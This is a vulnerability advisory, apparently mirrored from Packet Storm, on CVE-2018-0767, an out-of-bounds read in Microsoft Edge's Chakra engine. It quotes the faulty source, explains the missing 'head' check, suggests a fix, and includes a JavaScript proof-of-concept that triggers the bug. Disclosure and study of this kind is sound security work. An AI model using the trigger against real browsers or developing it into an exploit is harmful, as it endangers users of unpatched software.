Microsoft Edge Chakra suffers from an out-of-bounds read in AppendLeftOverItemsFromEndSegment.
57ff1eeea181d2940888ce4d3b228a20259ea5e0d4182f40d3f28e2391cb03efMicrosoft Edge: Chakra: OOB read in AppendLeftOverItemsFromEndSegment
CVE-2018-0767
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.
growby = endSeg->length;
current = current->GrowByMin(recycler, growby);
CopyArray(current->elements + endIndex + 1, endSeg->length,
((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
if (HasNoMissingValues())
{
if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
{
SetHasNoMissingValues(false);
}
}
In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method.
I guess it shoud be like:
if (current == head && HasNoMissingValues())
{
if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
{
SetHasNoMissingValues(false);
}
}
function trigger() {
let arr = [1.1];
let i = 0;
for (; i < 1000; i += 0.5) {
arr[i + 0x7777] = 2.0;
}
arr[1001] = 35480.0;
for (; i < 0x7777; i++) {
arr[i] = 1234.3;
}
}
for (let i = 0; i < 100; i++) {
trigger();
}
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed